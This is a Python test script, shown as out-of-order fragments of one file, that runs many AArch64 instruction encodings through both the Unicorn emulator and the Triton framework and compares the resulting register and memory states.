("\xeb\xff\x5f\x48", "ldaxrh w11, [sp]"),
("\xff\xff\x5f\x48", "ldaxrh wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x64\xa0\x84\xd2", "movz x4, #9475"),
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x2b\xf8\x80\xd2", "movz x11, #1985"),
("\x25\xfc\x9f\xc8", "stlr x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x9f\xc8", "stlr x11, [sp]"),
("\x25\x00\x00\xf8", "stur x5, [x1]"),
("\x26\x00\x00\x38", "sturb w6, [x1]"),
("\x27\x00\x00\x78", "sturh w7, [x1]"),
("\x29\xfc\x9f\xc8", "stlr x9, [x1]"),
("\x2a\xfc\x9f\x08", "stlrb w10, [x1]"),
("\x2b\xfc\x9f\x48", "stlrh w11, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x7c\x5f\xc8", "ldxr x0, [x1]"),
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+24
("\x20\x7c\x5f\x08", "ldxrb w0, [x1]"),
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+36
("\x20\x7c\x5f\x48", "ldxrh w0, [x1]"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x0c\xc0\xda", "rev x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x08\xc0\x5a", "rev w0, w1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x04\xc0\xda", "rev16 x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x04\xc0\x5a", "rev16 w0, w1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x08\xc0\xda", "rev32 x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x00\xc0\xda", "rbit x0, x1"),
("\x20\x00\xc0\x5a", "rbit w0, w1"),
("\x20\x00\x80\xd2", "movz x0, #1"),
("\x20\x00\xc0\xda", "rbit x0, x1"),
("\x20\x00\xc0\x5a", "rbit w0, w1"),
]
def emu_with_unicorn(opcode, istate):
# Initialize emulator in aarch64 mode
mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)
# map memory for this emulation
mu.mem_map(ADDR, SIZE)
# write machine code to be emulated to memory
index = 0
for op, _ in CODE:
mu.mem_write(ADDR+index, op)
index += len(op)
mu.mem_write(STACK, bytes(istate['stack']))
mu.mem_write(HEAP, bytes(istate['heap']))
mu.reg_write(UC_ARM64_REG_X0, istate['x0'])
mu.reg_write(UC_ARM64_REG_X1, istate['x1'])
mu.reg_write(UC_ARM64_REG_X2, istate['x2'])
mu.reg_write(UC_ARM64_REG_X3, istate['x3'])
mu.reg_write(UC_ARM64_REG_X4, istate['x4'])
mu.reg_write(UC_ARM64_REG_X5, istate['x5'])
mu.reg_write(UC_ARM64_REG_X6, istate['x6'])
mu.reg_write(UC_ARM64_REG_X7, istate['x7'])
mu.reg_write(UC_ARM64_REG_X8, istate['x8'])
mu.reg_write(UC_ARM64_REG_X9, istate['x9'])
mu.reg_write(UC_ARM64_REG_X10, istate['x10'])
mu.reg_write(UC_ARM64_REG_X11, istate['x11'])
mu.reg_write(UC_ARM64_REG_X12, istate['x12'])
mu.reg_write(UC_ARM64_REG_X13, istate['x13'])
mu.reg_write(UC_ARM64_REG_X14, istate['x14'])
mu.reg_write(UC_ARM64_REG_X15, istate['x15'])
mu.reg_write(UC_ARM64_REG_X16, istate['x16'])
mu.reg_write(UC_ARM64_REG_X17, istate['x17'])
mu.reg_write(UC_ARM64_REG_X18, istate['x18'])
mu.reg_write(UC_ARM64_REG_X19, istate['x19'])
mu.reg_write(UC_ARM64_REG_X20, istate['x20'])
mu.reg_write(UC_ARM64_REG_X21, istate['x21'])
mu.reg_write(UC_ARM64_REG_X22, istate['x22'])
mu.reg_write(UC_ARM64_REG_X23, istate['x23'])
mu.reg_write(UC_ARM64_REG_X24, istate['x24'])
mu.reg_write(UC_ARM64_REG_X25, istate['x25'])
mu.reg_write(UC_ARM64_REG_X26, istate['x26'])
mu.reg_write(UC_ARM64_REG_X27, istate['x27'])
mu.reg_write(UC_ARM64_REG_X28, istate['x28'])
mu.reg_write(UC_ARM64_REG_X29, istate['x29'])
mu.reg_write(UC_ARM64_REG_X30, istate['x30'])
mu.reg_write(UC_ARM64_REG_PC, istate['pc'])
mu.reg_write(UC_ARM64_REG_SP, istate['sp'])
mu.reg_write(UC_ARM64_REG_NZCV, istate['n'] << 31 | istate['z'] << 30 | istate['c'] << 29 | istate['v'] << 28)
# emulate code in infinite time & unlimited instructions
mu.emu_start(istate['pc'], istate['pc'] + len(opcode))
ostate = {
"stack": mu.mem_read(STACK, 0x100),
"heap": mu.mem_read(HEAP, 0x100),
"x0": mu.reg_read(UC_ARM64_REG_X0),
"x1": mu.reg_read(UC_ARM64_REG_X1),
"x2": mu.reg_read(UC_ARM64_REG_X2),
"x3": mu.reg_read(UC_ARM64_REG_X3),
"x4": mu.reg_read(UC_ARM64_REG_X4),
"x5": mu.reg_read(UC_ARM64_REG_X5),
"x6": mu.reg_read(UC_ARM64_REG_X6),
"x7": mu.reg_read(UC_ARM64_REG_X7),
"x8": mu.reg_read(UC_ARM64_REG_X8),
"x9": mu.reg_read(UC_ARM64_REG_X9),
"x10": mu.reg_read(UC_ARM64_REG_X10),
"x11": mu.reg_read(UC_ARM64_REG_X11),
"x12": mu.reg_read(UC_ARM64_REG_X12),
"x13": mu.reg_read(UC_ARM64_REG_X13),
"x14": mu.reg_read(UC_ARM64_REG_X14),
"x15": mu.reg_read(UC_ARM64_REG_X15),
"x16": mu.reg_read(UC_ARM64_REG_X16),
"x17": mu.reg_read(UC_ARM64_REG_X17),
"x18": mu.reg_read(UC_ARM64_REG_X18),
"x19": mu.reg_read(UC_ARM64_REG_X19),
"x20": mu.reg_read(UC_ARM64_REG_X20),
"x21": mu.reg_read(UC_ARM64_REG_X21),
"x22": mu.reg_read(UC_ARM64_REG_X22),
"x23": mu.reg_read(UC_ARM64_REG_X23),
"x24": mu.reg_read(UC_ARM64_REG_X24),
"x25": mu.reg_read(UC_ARM64_REG_X25),
"x26": mu.reg_read(UC_ARM64_REG_X26),
"x27": mu.reg_read(UC_ARM64_REG_X27),
"x28": mu.reg_read(UC_ARM64_REG_X28),
"x29": mu.reg_read(UC_ARM64_REG_X29),
"x30": mu.reg_read(UC_ARM64_REG_X30),
"x30": mu.reg_read(UC_ARM64_REG_X30),
"pc": mu.reg_read(UC_ARM64_REG_PC),
"sp": mu.reg_read(UC_ARM64_REG_SP),
"n": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 31) & 1),
"z": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 30) & 1),
"c": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 29) & 1),
"v": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 28) & 1),
}
return ostate
def emu_with_triton(opcode, istate):
ctx = TritonContext()
ctx.setArchitecture(ARCH.AARCH64)
inst = Instruction(opcode)
inst.setAddress(istate['pc'])
ctx.setConcreteMemoryAreaValue(STACK, bytes(istate['stack']))
ctx.setConcreteMemoryAreaValue(HEAP, bytes(istate['heap']))
ctx.setConcreteRegisterValue(ctx.registers.x0, istate['x0'])
ctx.setConcreteRegisterValue(ctx.registers.x1, istate['x1'])
ctx.setConcreteRegisterValue(ctx.registers.x2, istate['x2'])
ctx.setConcreteRegisterValue(ctx.registers.x3, istate['x3'])
ctx.setConcreteRegisterValue(ctx.registers.x4, istate['x4'])
ctx.setConcreteRegisterValue(ctx.registers.x5, istate['x5'])
ctx.setConcreteRegisterValue(ctx.registers.x6, istate['x6'])
ctx.setConcreteRegisterValue(ctx.registers.x7, istate['x7'])
ctx.setConcreteRegisterValue(ctx.registers.x8, istate['x8'])
ctx.setConcreteRegisterValue(ctx.registers.x9, istate['x9'])
ctx.setConcreteRegisterValue(ctx.registers.x10, istate['x10'])
ctx.setConcreteRegisterValue(ctx.registers.x11, istate['x11'])
ctx.setConcreteRegisterValue(ctx.registers.x12, istate['x12'])
ctx.setConcreteRegisterValue(ctx.registers.x13, istate['x13'])
ctx.setConcreteRegisterValue(ctx.registers.x14, istate['x14'])
ctx.setConcreteRegisterValue(ctx.registers.x15, istate['x15'])
ctx.setConcreteRegisterValue(ctx.registers.x16, istate['x16'])
ctx.setConcreteRegisterValue(ctx.registers.x17, istate['x17'])
ctx.setConcreteRegisterValue(ctx.registers.x18, istate['x18'])
ctx.setConcreteRegisterValue(ctx.registers.x19, istate['x19'])
ctx.setConcreteRegisterValue(ctx.registers.x20, istate['x20'])
ctx.setConcreteRegisterValue(ctx.registers.x21, istate['x21'])
ctx.setConcreteRegisterValue(ctx.registers.x22, istate['x22'])
ctx.setConcreteRegisterValue(ctx.registers.x23, istate['x23'])
ctx.setConcreteRegisterValue(ctx.registers.x24, istate['x24'])
ctx.setConcreteRegisterValue(ctx.registers.x25, istate['x25'])
ctx.setConcreteRegisterValue(ctx.registers.x26, istate['x26'])
ctx.setConcreteRegisterValue(ctx.registers.x27, istate['x27'])
ctx.setConcreteRegisterValue(ctx.registers.x28, istate['x28'])
ctx.setConcreteRegisterValue(ctx.registers.x29, istate['x29'])
ctx.setConcreteRegisterValue(ctx.registers.x30, istate['x30'])
ctx.setConcreteRegisterValue(ctx.registers.pc, istate['pc'])
ctx.setConcreteRegisterValue(ctx.registers.sp, istate['sp'])
ctx.setConcreteRegisterValue(ctx.registers.n, istate['n'])
ctx.setConcreteRegisterValue(ctx.registers.z, istate['z'])
ctx.setConcreteRegisterValue(ctx.registers.c, istate['c'])
ctx.setConcreteRegisterValue(ctx.registers.v, istate['v'])
ctx.processing(inst)
#print
#print inst
#for x in inst.getSymbolicExpressions():
# print x
#print
ostate = {
"stack": ctx.getConcreteMemoryAreaValue(STACK, 0x100),
"heap": ctx.getConcreteMemoryAreaValue(HEAP, 0x100),
"x0": ctx.getSymbolicRegisterValue(ctx.registers.x0),
"x1": ctx.getSymbolicRegisterValue(ctx.registers.x1),
"x2": ctx.getSymbolicRegisterValue(ctx.registers.x2),
"x3": ctx.getSymbolicRegisterValue(ctx.registers.x3),
"x4": ctx.getSymbolicRegisterValue(ctx.registers.x4),
"x5": ctx.getSymbolicRegisterValue(ctx.registers.x5),
"x6": ctx.getSymbolicRegisterValue(ctx.registers.x6),
"x7": ctx.getSymbolicRegisterValue(ctx.registers.x7),
"x8": ctx.getSymbolicRegisterValue(ctx.registers.x8),
"x9": ctx.getSymbolicRegisterValue(ctx.registers.x9),
"x10": ctx.getSymbolicRegisterValue(ctx.registers.x10),
"x11": ctx.getSymbolicRegisterValue(ctx.registers.x11),
"x12": ctx.getSymbolicRegisterValue(ctx.registers.x12),
"x13": ctx.getSymbolicRegisterValue(ctx.registers.x13),
"x14": ctx.getSymbolicRegisterValue(ctx.registers.x14),
"x15": ctx.getSymbolicRegisterValue(ctx.registers.x15),
"x16": ctx.getSymbolicRegisterValue(ctx.registers.x16),
"x17": ctx.getSymbolicRegisterValue(ctx.registers.x17),
"x18": ctx.getSymbolicRegisterValue(ctx.registers.x18),
"x19": ctx.getSymbolicRegisterValue(ctx.registers.x19),
"x20": ctx.getSymbolicRegisterValue(ctx.registers.x20),
"x21": ctx.getSymbolicRegisterValue(ctx.registers.x21),
"x22": ctx.getSymbolicRegisterValue(ctx.registers.x22),
"x23": ctx.getSymbolicRegisterValue(ctx.registers.x23),
"x24": ctx.getSymbolicRegisterValue(ctx.registers.x24),
"x25": ctx.getSymbolicRegisterValue(ctx.registers.x25),
"x26": ctx.getSymbolicRegisterValue(ctx.registers.x26),
"x27": ctx.getSymbolicRegisterValue(ctx.registers.x27),
"x28": ctx.getSymbolicRegisterValue(ctx.registers.x28),
"x29": ctx.getSymbolicRegisterValue(ctx.registers.x29),
"x30": ctx.getSymbolicRegisterValue(ctx.registers.x30),
"x30": ctx.getSymbolicRegisterValue(ctx.registers.x30),
"pc": ctx.getSymbolicRegisterValue(ctx.registers.pc),
"sp": ctx.getSymbolicRegisterValue(ctx.registers.sp),
"n": ctx.getSymbolicRegisterValue(ctx.registers.n),
"z": ctx.getSymbolicRegisterValue(ctx.registers.z),
"c": ctx.getSymbolicRegisterValue(ctx.registers.c),
"v": ctx.getSymbolicRegisterValue(ctx.registers.v),
}
return ostate
def diff_state(state1, state2):
for k, v in list(state1.items()):
if (k == 'heap' or k == 'stack') and v != state2[k]:
print('\t%s: (UC) != (TT)' %(k))
elif not (k == 'heap' or k == 'stack') and v != state2[k]:
print('\t%s: %#x (UC) != %#x (TT)' %(k, v, state2[k]))
return
if __name__ == '__main__':
# initial state
state = {
"stack": "".join([chr(255 - i) for i in range(256)]),
"heap": "".join([chr(i) for i in range(256)]),
"x0": 0,
"x1": 0,
"x2": 0,
"x3": 0,
"x4": 0,
"x5": 0,
"x6": 0,
"x7": 0,
"x8": 0,
"x9": 0,
"x10": 0,
"x11": 0,
"x12": 0,
"x13": 0,
"x14": 0,
"x15": 0,
"x16": 0,
"x17": 0,
"x18": 0,
"x19": 0,
"x20": 0,
"x21": 0,
"x22": 0,
"x23": 0,
"x24": 0,
"x25": 0,
"x26": 0,
"x27": 0,
"x28": 0,
"x29": 0,
"x30": 0,
"x30": 0,
"pc": ADDR,
"sp": STACK,
"n": 0,
"z": 0,
"c": 0,
"v": 0,
}
for opcode, disassembly in CODE:
try:
uc_state = emu_with_unicorn(opcode, state)
tt_state = emu_with_triton(opcode, state)
except Exception as e:
print('[KO] %s' %(disassembly))
print('\t%s' %(e))
sys.exit(-1)
if uc_state != tt_state:
print('[KO] %s' %(disassembly))
diff_state(uc_state, tt_state)
sys.exit(-1)
print('[OK] %s' %(disassembly))
state = tt_state
sys.exit(0)
| 42.577165 | 114 | 0.508482 |
import sys
import pprint
from triton import *
from unicorn import *
from unicorn.arm64_const import *
ADDR = 0x100000
STACK = 0x200000
HEAP = 0x300000
SIZE = 5 * 1024 * 1024
CODE = [
("\x80\x46\x82\xd2", "movz x0, #0x1234"),
("\x80\x46\xa2\xd2", "movz x0, #0x1234, lsl #16"),
("\x80\x46\xc2\xd2", "movz x0, #0x1234, lsl #32"),
("\x80\x46\xe2\xd2", "movz x0, #0x1234, lsl #48"),
("\x21\x64\x88\xd2", "movz x1, #0x4321"),
("\x21\x64\xa8\xd2", "movz x1, #0x4321, lsl #16"),
("\x21\x64\xc8\xd2", "movz x1, #0x4321, lsl #32"),
("\x21\x64\xe8\xd2", "movz x1, #0x4321, lsl #48"),
("\x21\x64\xe8\xd2", "movz x1, #0x4321, lsl #48"),
("\x21\x64\xc8\xd2", "movz x1, #0x4321, lsl #32"),
("\x21\x64\xa8\xd2", "movz x1, #0x4321, lsl #16"),
("\x21\x64\x88\xf2", "movk x1, #0x4321"),
("\x81\x46\xa2\xf2", "movk x1, #0x1234, lsl #16"),
("\x81\x04\xcf\xf2", "movk x1, #0x7824, lsl #32"),
("\x61\x8a\xf2\xf2", "movk x1, #0x9453, lsl #48"),
("\xe0\xcc\x8c\x52", "movz w0, #0x6667"),
("\xc0\xcc\xac\x72", "movk w0, #0x6666, lsl #16"),
("\x1f\x20\x03\xd5", "nop"),
("\x1f\x20\x03\xd5", "nop"),
("\x1f\x20\x03\xd5", "nop"),
("\x60\x00\x02\x8b", "add x0, x3, x2"),
("\x20\x00\x02\x8b", "add x0, x1, x2"),
("\x80\x46\xa2\xd2", "movz x0, #0x1234, lsl #16"),
("\x00\x00\x00\x8b", "add x0, x0, x0"),
("\x60\xc0\x22\x8b", "add x0, x3, w2, sxtw"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\x8b", "add x0, x1, w2, sxtb"),
("\x20\xa0\x22\x8b", "add x0, x1, w2, sxth"),
("\x20\xc0\x22\x8b", "add x0, x1, w2, sxtw"),
("\x20\xe0\x22\x8b", "add x0, x1, x2, sxtx"),
("\x20\x00\x02\x8b", "add x0, x1, x2, lsl #0"),
("\x20\x04\x02\x8b", "add x0, x1, x2, lsl #1"),
("\x20\x20\x02\x8b", "add x0, x1, x2, lsl #8"),
("\x20\x40\x02\x8b", "add x0, x1, x2, lsl #16"),
("\x20\x80\x02\x8b", "add x0, x1, x2, lsl #32"),
("\x20\x84\x02\x8b", "add x0, x1, x2, lsl #33"),
("\x20\x88\x02\x8b", "add x0, x1, x2, lsl #34"),
("\x20\x00\x42\x8b", "add x0, x1, x2, lsr #0"),
("\x20\x04\x42\x8b", "add x0, x1, x2, lsr #1"),
("\x20\x20\x42\x8b", "add x0, x1, x2, lsr #8"),
("\x20\x40\x42\x8b", "add x0, x1, x2, lsr #16"),
("\x20\x80\x42\x8b", "add x0, x1, x2, lsr #32"),
("\x20\x84\x42\x8b", "add x0, x1, x2, lsr #33"),
("\x20\x88\x42\x8b", "add x0, x1, x2, lsr #34"),
("\x20\x20\x82\x8b", "add x0, x1, x2, asr #8"),
("\x20\x40\x82\x8b", "add x0, x1, x2, asr #16"),
("\x20\x80\x82\x8b", "add x0, x1, x2, asr #32"),
("\x20\x84\x82\x8b", "add x0, x1, x2, asr #33"),
("\x20\x88\x82\x8b", "add x0, x1, x2, asr #34"),
("\x20\x88\x82\x8b", "add x0, x1, x2, asr #34"),
("\x20\x88\x19\x91", "add x0, x1, #1634"),
("\x20\x58\x21\x91", "add x0, x1, #2134"),
("\x20\x58\x61\x91", "add x0, x1, #2134, lsl #12"),
("\x3f\x60\x22\x8b", "add sp, x1, x2"),
("\x60\x00\x02\xab", "adds x0, x3, x2"),
("\x20\x00\x02\xab", "adds x0, x1, x2"),
("\x80\x46\xa2\xd2", "movz x0, #0x1234, lsl #16"),
("\x00\x00\x00\xab", "adds x0, x0, x0"),
("\x60\xc0\x22\xab", "adds x0, x3, w2, sxtw"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\xab", "adds x0, x1, w2, sxtb"),
("\x20\xa0\x22\xab", "adds x0, x1, w2, sxth"),
("\x20\xc0\x22\xab", "adds x0, x1, w2, sxtw"),
("\x20\xe0\x22\xab", "adds x0, x1, x2, sxtx"),
("\x20\x00\x02\xab", "adds x0, x1, x2, lsl #0"),
("\x20\x04\x02\xab", "adds x0, x1, x2, lsl #1"),
("\x20\x20\x02\xab", "adds x0, x1, x2, lsl #8"),
("\x20\x40\x02\xab", "adds x0, x1, x2, lsl #16"),
("\x20\x80\x02\xab", "adds x0, x1, x2, lsl #32"),
("\x20\x84\x02\xab", "adds x0, x1, x2, lsl #33"),
("\x20\x88\x02\xab", "adds x0, x1, x2, lsl #34"),
("\x20\x00\x42\xab", "adds x0, x1, x2, lsr #0"),
("\x20\x04\x42\xab", "adds x0, x1, x2, lsr #1"),
("\x20\x20\x42\xab", "adds x0, x1, x2, lsr #8"),
("\x20\x40\x42\xab", "adds x0, x1, x2, lsr #16"),
("\x20\x80\x42\xab", "adds x0, x1, x2, lsr #32"),
("\x20\x84\x42\xab", "adds x0, x1, x2, lsr #33"),
("\x20\x88\x42\xab", "adds x0, x1, x2, lsr #34"),
("\x20\x20\x82\xab", "adds x0, x1, x2, asr #8"),
("\x20\x40\x82\xab", "adds x0, x1, x2, asr #16"),
("\x20\x80\x82\xab", "adds x0, x1, x2, asr #32"),
("\x20\x84\x82\xab", "adds x0, x1, x2, asr #33"),
("\x20\x88\x82\xab", "adds x0, x1, x2, asr #34"),
("\x20\x88\x82\xab", "adds x0, x1, x2, asr #34"),
("\x20\x88\x19\xb1", "adds x0, x1, #1634"),
("\x20\x58\x21\xb1", "adds x0, x1, #2134"),
("\x20\x58\x61\xb1", "adds x0, x1, #2134, lsl #12"),
("\x00\x00\x00\xab", "adds x0, x0, x0"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x00\x04\x00\xb1", "adds x0, x0, #1"),
("\x20\x00\x02\x9a", "adc x0, x1, x2"),
("\x20\x00\x02\x1a", "adc w0, w1, w2"),
("\x20\x1a\x09\x30", "adr x0, #0x12345"),
("\xe1\xff\x7f\x70", "adr x1, #0xfffff"),
("\xc1\x7c\x00\xd0", "adrp x1, #0xf9a000"),
("\x41\x0c\x00\xf0", "adrp x1, #0x18b000"),
("\xe1\xff\x9f\xd2", "movz x1, #0xffff"),
("\x22\x00\x80\xd2", "movz x2, #0x1"),
("\x20\x1c\x40\x92", "and x0, x1, #0xff"),
("\x20\x00\x40\x92", "and x0, x1, #0x01"),
("\x20\x00\x7c\x92", "and x0, x1, #0x10"),
("\x20\x00\x02\x8a", "and x0, x1, x2"),
("\x20\x04\x02\x8a", "and x0, x1, x2, lsl #1"),
("\x20\x08\x02\x8a", "and x0, x1, x2, lsl #2"),
("\x20\x0c\x02\x8a", "and x0, x1, x2, lsl #3"),
("\x20\x10\x02\x8a", "and x0, x1, x2, lsl #4"),
("\x20\x1c\x40\xf2", "ands x0, x1, #0xff"),
("\x20\x00\x40\xf2", "ands x0, x1, #0x01"),
("\x20\x00\x7c\xf2", "ands x0, x1, #0x10"),
("\x20\x00\x02\xea", "ands x0, x1, x2"),
("\x20\x04\x02\xea", "ands x0, x1, x2, lsl #1"),
("\x20\x08\x02\xea", "ands x0, x1, x2, lsl #2"),
("\x20\x0c\x02\xea", "ands x0, x1, x2, lsl #3"),
("\x20\x10\x02\xea", "ands x0, x1, x2, lsl #4"),
("\x3f\x1c\x40\xf2", "tst x1, #0xff"),
("\x3f\x00\x40\xf2", "tst x1, #0x01"),
("\x3f\x00\x7c\xf2", "tst x1, #0x10"),
("\x3f\x00\x02\xea", "tst x1, x2"),
("\x3f\x04\x02\xea", "tst x1, x2, lsl #1"),
("\x3f\x08\x02\xea", "tst x1, x2, lsl #2"),
("\x3f\x0c\x02\xea", "tst x1, x2, lsl #3"),
("\x3f\x10\x02\xea", "tst x1, x2, lsl #4"),
("\x20\xfc\x41\x93", "asr x0, x1, #1"),
("\x20\xfc\x42\x93", "asr x0, x1, #2"),
("\x20\xfc\x43\x93", "asr x0, x1, #3"),
("\x20\xfc\x44\x93", "asr x0, x1, #4"),
("\x20\xfc\x44\x93", "asr x0, x1, #4"),
("\x20\xfc\x7f\x93", "asr x0, x1, #63"),
("\xe1\xff\x9f\xd2", "movz x1, #0xffff"),
("\x22\x00\x80\xd2", "movz x2, #0x1"),
("\x20\x28\xc2\x9a", "asr x0, x1, x2"),
("\x42\x00\x80\xd2", "movz x2, #0x2"),
("\x20\x28\xc2\x9a", "asr x0, x1, x2"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\xcb", "sub x0, x1, w2, sxtb"),
("\x20\xa0\x22\xcb", "sub x0, x1, w2, sxth"),
("\x20\xc0\x22\xcb", "sub x0, x1, w2, sxtw"),
("\x20\xe0\x22\xcb", "sub x0, x1, x2, sxtx"),
("\x20\x00\x02\xcb", "sub x0, x1, x2, lsl #0"),
("\x20\x04\x02\xcb", "sub x0, x1, x2, lsl #1"),
("\x20\x20\x02\xcb", "sub x0, x1, x2, lsl #8"),
("\x20\x40\x02\xcb", "sub x0, x1, x2, lsl #16"),
("\x20\x80\x02\xcb", "sub x0, x1, x2, lsl #32"),
("\x20\x84\x02\xcb", "sub x0, x1, x2, lsl #33"),
("\x20\x88\x02\xcb", "sub x0, x1, x2, lsl #34"),
("\x20\x00\x42\xcb", "sub x0, x1, x2, lsr #0"),
("\x20\x04\x42\xcb", "sub x0, x1, x2, lsr #1"),
("\x20\x20\x42\xcb", "sub x0, x1, x2, lsr #8"),
("\x20\x40\x42\xcb", "sub x0, x1, x2, lsr #16"),
("\x20\x80\x42\xcb", "sub x0, x1, x2, lsr #32"),
("\x20\x84\x42\xcb", "sub x0, x1, x2, lsr #33"),
("\x20\x88\x42\xcb", "sub x0, x1, x2, lsr #34"),
("\x20\x20\x82\xcb", "sub x0, x1, x2, asr #8"),
("\x20\x40\x82\xcb", "sub x0, x1, x2, asr #16"),
("\x20\x80\x82\xcb", "sub x0, x1, x2, asr #32"),
("\x20\x84\x82\xcb", "sub x0, x1, x2, asr #33"),
("\x20\x88\x82\xcb", "sub x0, x1, x2, asr #34"),
("\x20\x88\x82\xcb", "sub x0, x1, x2, asr #34"),
("\x20\x88\x19\xd1", "sub x0, x1, #1634"),
("\x20\x58\x21\xd1", "sub x0, x1, #2134"),
("\x20\x58\x61\xd1", "sub x0, x1, #2134, lsl #12"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\xeb", "subs x0, x1, w2, sxtb"),
("\x20\xa0\x22\xeb", "subs x0, x1, w2, sxth"),
("\x20\xc0\x22\xeb", "subs x0, x1, w2, sxtw"),
("\x20\xe0\x22\xeb", "subs x0, x1, x2, sxtx"),
("\x20\x00\x02\xeb", "subs x0, x1, x2, lsl #0"),
("\x20\x04\x02\xeb", "subs x0, x1, x2, lsl #1"),
("\x20\x20\x02\xeb", "subs x0, x1, x2, lsl #8"),
("\x20\x40\x02\xeb", "subs x0, x1, x2, lsl #16"),
("\x20\x80\x02\xeb", "subs x0, x1, x2, lsl #32"),
("\x20\x84\x02\xeb", "subs x0, x1, x2, lsl #33"),
("\x20\x88\x02\xeb", "subs x0, x1, x2, lsl #34"),
("\x20\x00\x42\xeb", "subs x0, x1, x2, lsr #0"),
("\x20\x04\x42\xeb", "subs x0, x1, x2, lsr #1"),
("\x20\x20\x42\xeb", "subs x0, x1, x2, lsr #8"),
("\x20\x40\x42\xeb", "subs x0, x1, x2, lsr #16"),
("\x20\x80\x42\xeb", "subs x0, x1, x2, lsr #32"),
("\x20\x84\x42\xeb", "subs x0, x1, x2, lsr #33"),
("\x20\x88\x42\xeb", "subs x0, x1, x2, lsr #34"),
("\x20\x20\x82\xeb", "subs x0, x1, x2, asr #8"),
("\x20\x40\x82\xeb", "subs x0, x1, x2, asr #16"),
("\x20\x80\x82\xeb", "subs x0, x1, x2, asr #32"),
("\x20\x84\x82\xeb", "subs x0, x1, x2, asr #33"),
("\x20\x88\x82\xeb", "subs x0, x1, x2, asr #34"),
("\x20\x88\x82\xeb", "subs x0, x1, x2, asr #34"),
("\x20\x88\x19\xf1", "subs x0, x1, #1634"),
("\x20\x58\x21\xf1", "subs x0, x1, #2134"),
("\x20\x58\x61\xf1", "subs x0, x1, #2134, lsl #12"),
("\x20\x00\x02\xca", "eor x0, x1, x2, lsl #0"),
("\x20\x04\x02\xca", "eor x0, x1, x2, lsl #1"),
("\x20\x20\x02\xca", "eor x0, x1, x2, lsl #8"),
("\x20\x40\x02\xca", "eor x0, x1, x2, lsl #16"),
("\x20\x80\x02\xca", "eor x0, x1, x2, lsl #32"),
("\x20\x84\x02\xca", "eor x0, x1, x2, lsl #33"),
("\x20\x88\x02\xca", "eor x0, x1, x2, lsl #34"),
("\x20\x00\x42\xca", "eor x0, x1, x2, lsr #0"),
("\x20\x04\x42\xca", "eor x0, x1, x2, lsr #1"),
("\x20\x20\x42\xca", "eor x0, x1, x2, lsr #8"),
("\x20\x40\x42\xca", "eor x0, x1, x2, lsr #16"),
("\x20\x80\x42\xca", "eor x0, x1, x2, lsr #32"),
("\x20\x84\x42\xca", "eor x0, x1, x2, lsr #33"),
("\x20\x88\x42\xca", "eor x0, x1, x2, lsr #34"),
("\x20\x20\x82\xca", "eor x0, x1, x2, asr #8"),
("\x20\x40\x82\xca", "eor x0, x1, x2, asr #16"),
("\x20\x80\x82\xca", "eor x0, x1, x2, asr #32"),
("\x20\x84\x82\xca", "eor x0, x1, x2, asr #33"),
("\x20\x88\x82\xca", "eor x0, x1, x2, asr #34"),
("\x20\x88\x82\xca", "eor x0, x1, x2, asr #34"),
("\x20\x1c\x40\xd2", "eor x0, x1, #255"),
("\x20\x18\x40\xd2", "eor x0, x1, #0x7f"),
("\x20\x00\x40\xd2", "eor x0, x1, #1"),
("\x20\x00\x22\xca", "eon x0, x1, x2, lsl #0"),
("\x20\x04\x22\xca", "eon x0, x1, x2, lsl #1"),
("\x20\x20\x22\xca", "eon x0, x1, x2, lsl #8"),
("\x20\x40\x22\xca", "eon x0, x1, x2, lsl #16"),
("\x20\x80\x22\xca", "eon x0, x1, x2, lsl #32"),
("\x20\x84\x22\xca", "eon x0, x1, x2, lsl #33"),
("\x20\x88\x22\xca", "eon x0, x1, x2, lsl #34"),
("\x20\x00\x62\xca", "eon x0, x1, x2, lsr #0"),
("\x20\x04\x62\xca", "eon x0, x1, x2, lsr #1"),
